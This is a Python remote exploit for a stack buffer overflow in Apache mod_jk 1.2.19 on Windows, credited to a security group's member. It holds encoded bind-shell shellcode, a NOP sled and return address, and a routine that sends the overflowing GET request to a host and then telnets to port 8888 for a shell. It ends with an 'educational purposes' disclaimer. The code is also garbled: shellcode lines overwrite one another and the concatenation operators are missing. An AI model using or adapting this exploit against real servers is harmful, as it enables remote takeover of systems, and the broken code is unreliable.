Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)

#!/usr/bin/python

#

# _____ _ _ _____ _____ _____ _____

# / ___| |_| | _ \\| _ | _ |_ _|

# | (___| _ | [_)_/| (_) | (_) | | |

# \\_____|_| |_|_| |_||_____|_____| |_|

# C. H. R. O. O. T. SECURITY GROUP

# – — —– — — — —- — — –

# http://www.chroot.org

#

# _ _ _ _____ ____ ____ __ _

# Hacks In Taiwan | |_| | |_ _| __| | \\| |

# Conference 2008 | _ | | | | | (__| () | |

# |_| |_|_| |_| \\____|____|_|\\__|

# http://www.hitcon.org

#

#

# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit

#

# Author ======:: unohope [at] chroot [dot] org

#

# IRC =========:: irc.chroot.org #chroot

#

# ScriptName ==:: Apache Module mod_jk/1.2.19

#

# Vendor ======:: http://tomcat.apache.org/

#

# Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/

#

# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19

# Apache/2.0.59 (Win32) mod_jk/1.2.19

#

# Greets ======:: zha0

#

#

# [root@wargame tmp]# ./apx-jk_mod-1.2.19

# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)

#

# usage: ./apx-jk_mod-1.2.19 <host>

#

# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78

# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)

#

# [ ] connecting to 192.168.1.78 …

#

# Trying 192.168.1.78…

# Connected to 192.168.1.78.

# Escape character is \’^]\’.

# Microsoft Windows XP [.. 5.1.2600]

# (C) Copyright 1985-2001 Microsoft Corp.

#

# C:\\AppServ\\Apache2>

#

#

import os, sys, time

from socket import *

shellcode = "\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49"

shellcode = "\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x68"

shellcode = "\\x58\\x30\\x41\\x31\\x50\\x42\\x41\\x6b\\x42\\x41\\x78\\x42\\x32\\x42\\x41\\x32"

shellcode = "\\x41\\x41\\x30\\x41\\x41\\x58\\x38\\x42\\x42\\x50\\x75\\x4b\\x59\\x49\\x6c\\x43"

shellcode = "\\x5a\\x7a\\x4b\\x32\\x6d\\x5a\\x48\\x5a\\x59\\x69\\x6f\\x4b\\x4f\\x39\\x6f\\x71"

shellcode = "\\x70\\x6e\\x6b\\x62\\x4c\\x44\\x64\\x71\\x34\\x4c\\x4b\\x62\\x65\\x75\\x6c\\x4c"

shellcode = "\\x4b\\x63\\x4c\\x76\\x65\\x70\\x78\\x35\\x51\\x48\\x6f\\x6c\\x4b\\x50\\x4f\\x74"

shellcode = "\\x58\\x6e\\x6b\\x33\\x6f\\x55\\x70\\x37\\x71\\x48\\x6b\\x57\\x39\\x6c\\x4b\\x66"

shellcode = "\\x54\\x6e\\x6b\\x46\\x61\\x7a\\x4e\\x47\\x41\\x6b\\x70\\x7a\\x39\\x4c\\x6c\\x4c"

shellcode = "\\x44\\x6f\\x30\\x62\\x54\\x44\\x47\\x38\\x41\\x4b\\x7a\\x54\\x4d\\x44\\x41\\x4b"

shellcode = "\\x72\\x78\\x6b\\x39\\x64\\x35\\x6b\\x53\\x64\\x75\\x74\\x46\\x48\\x72\\x55\\x79"

shellcode = "\\x75\\x6c\\x4b\\x53\\x6f\\x76\\x44\\x44\\x41\\x48\\x6b\\x35\\x36\\x4e\\x6b\\x54"

shellcode = "\\x4c\\x30\\x4b\\x6c\\x4b\\x51\\x4f\\x65\\x4c\\x65\\x51\\x38\\x6b\\x77\\x73\\x36"

shellcode = "\\x4c\\x4e\\x6b\\x6e\\x69\\x30\\x6c\\x66\\x44\\x45\\x4c\\x30\\x61\\x69\\x53\\x30"

shellcode = "\\x31\\x79\\x4b\\x43\\x54\\x6c\\x4b\\x63\\x73\\x44\\x70\\x4e\\x6b\\x77\\x30\\x66"

shellcode = "\\x6c\\x6c\\x4b\\x72\\x50\\x45\\x4c\\x4c\\x6d\\x4e\\x6b\\x73\\x70\\x64\\x48\\x73"

shellcode = "\\x6e\\x55\\x38\\x6e\\x6e\\x32\\x6e\\x34\\x4e\\x58\\x6c\\x62\\x70\\x39\\x6f\\x6b"

shellcode = "\\x66\\x70\\x66\\x61\\x43\\x52\\x46\\x71\\x78\\x30\\x33\\x55\\x62\\x63\\x58\\x63"

shellcode = "\\x47\\x34\\x33\\x65\\x62\\x41\\x4f\\x30\\x54\\x39\\x6f\\x4a\\x70\\x52\\x48\\x5a"

shellcode = "\\x6b\\x38\\x6d\\x6b\\x4c\\x75\\x6b\\x30\\x50\\x6b\\x4f\\x6e\\x36\\x53\\x6f\\x6f"

shellcode = "\\x79\\x4a\\x45\\x32\\x46\\x6f\\x71\\x6a\\x4d\\x34\\x48\\x77\\x72\\x73\\x65\\x73"

shellcode = "\\x5a\\x37\\x72\\x69\\x6f\\x58\\x50\\x52\\x48\\x4e\\x39\\x76\\x69\\x4a\\x55\\x4c"

shellcode = "\\x6d\\x32\\x77\\x69\\x6f\\x59\\x46\\x50\\x53\\x43\\x63\\x41\\x43\\x70\\x53\\x70"

shellcode = "\\x53\\x43\\x73\\x50\\x53\\x62\\x63\\x70\\x53\\x79\\x6f\\x6a\\x70\\x35\\x36\\x61"

shellcode = "\\x78\\x71\\x32\\x78\\x38\\x71\\x76\\x30\\x53\\x4b\\x39\\x69\\x71\\x4d\\x45\\x33"

shellcode = "\\x58\\x6c\\x64\\x47\\x6a\\x74\\x30\\x5a\\x67\\x43\\x67\\x79\\x6f\\x39\\x46\\x32"

shellcode = "\\x4a\\x56\\x70\\x66\\x31\\x76\\x35\\x59\\x6f\\x58\\x50\\x32\\x48\\x4d\\x74\\x4e"

shellcode = "\\x4d\\x66\\x4e\\x7a\\x49\\x50\\x57\\x6b\\x4f\\x6e\\x36\\x46\\x33\\x56\\x35\\x39"

shellcode = "\\x6f\\x78\\x50\\x33\\x58\\x6b\\x55\\x51\\x59\\x4e\\x66\\x50\\x49\\x51\\x47\\x39"

shellcode = "\\x6f\\x48\\x56\\x32\\x70\\x32\\x74\\x62\\x74\\x46\\x35\\x4b\\x4f\\x38\\x50\\x6e"

shellcode = "\\x73\\x55\\x38\\x4d\\x37\\x71\\x69\\x69\\x56\\x71\\x69\\x61\\x47\\x6b\\x4f\\x6e"

shellcode = "\\x36\\x36\\x35\\x79\\x6f\\x6a\\x70\\x55\\x36\\x31\\x7a\\x71\\x74\\x32\\x46\\x51"

shellcode = "\\x78\\x52\\x43\\x70\\x6d\\x4f\\x79\\x4d\\x35\\x72\\x4a\\x66\\x30\\x42\\x79\\x64"

shellcode = "\\x69\\x7a\\x6c\\x4b\\x39\\x48\\x67\\x62\\x4a\\x57\\x34\\x4f\\x79\\x6d\\x32\\x37"

shellcode = "\\x41\\x6b\\x70\\x7a\\x53\\x6e\\x4a\\x69\\x6e\\x32\\x62\\x46\\x4d\\x6b\\x4e\\x70"

shellcode = "\\x42\\x44\\x6c\\x4c\\x53\\x6e\\x6d\\x31\\x6a\\x64\\x78\\x4c\\x6b\\x4e\\x4b\\x4e"

shellcode = "\\x4b\\x43\\x58\\x70\\x72\\x69\\x6e\\x6d\\x63\\x37\\x66\\x79\\x6f\\x63\\x45\\x73"

shellcode = "\\x74\\x4b\\x4f\\x7a\\x76\\x63\\x6b\\x31\\x47\\x72\\x72\\x41\\x41\\x50\\x51\\x61"

shellcode = "\\x41\\x70\\x6a\\x63\\x31\\x41\\x41\\x46\\x31\\x71\\x45\\x51\\x41\\x4b\\x4f\\x78"

shellcode = "\\x50\\x52\\x48\\x4c\\x6d\\x79\\x49\\x54\\x45\\x38\\x4e\\x53\\x63\\x6b\\x4f\\x6e"

shellcode = "\\x36\\x30\\x6a\\x49\\x6f\\x6b\\x4f\\x70\\x37\\x4b\\x4f\\x4e\\x30\\x4e\\x6b\\x30"

shellcode = "\\x57\\x69\\x6c\\x6b\\x33\\x4b\\x74\\x62\\x44\\x79\\x6f\\x6b\\x66\\x66\\x32\\x6b"

shellcode = "\\x4f\\x4e\\x30\\x53\\x58\\x58\\x70\\x4e\\x6a\\x55\\x54\\x41\\x4f\\x52\\x73\\x4b"

shellcode = "\\x4f\\x69\\x46\\x4b\\x4f\\x6e\\x30\\x68";

foo_base = 8

buf_base = 4087

buf_offset = foo_base * 11

nop = "\\x90"

ret = "\\xcc\\x2a\\xd9\\x77"

buf = nop*foo_base shellcode nop*(buf_base – foo_base – len(shellcode) – buf_offset) ret

buf = "\\x90\\x90\\xb0\\x53\\x6b\\xC0\\x28\\x03\\xd8\\xff\\xd3" nop*(buf_offset – foo_base – 3)

def usage():

print \’usage: %s <host>\\n\’ % sys.argv[0]

sys.exit(-1)

def xpl():

try:

print len(buf)

sockaddr = (host, 80)

s = socket(AF_INET, SOCK_STREAM)

s.connect(sockaddr)

payload = buf \’HTTP/1.0\\r\\nHost: %s\\r\\n\\r\\n\\0\’ % host

s.send(\’GET /\’ payload)

s.close()

print \’ [ ] connecting to %s …\\n\’ % host

time.sleep(3)

os.system("telnet %s 8888" % host)

except:

print \’ [-] EXPLOIT FAILED!\\n\’

if __name__ == \’__main__\’:

print \’Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\\n\’

try:

host = sys.argv[1]

except IndexError:

usage()

xpl()

# [NOTE]

#

# !! This is just for educational purposes, DO NOT use for illegal. !!

#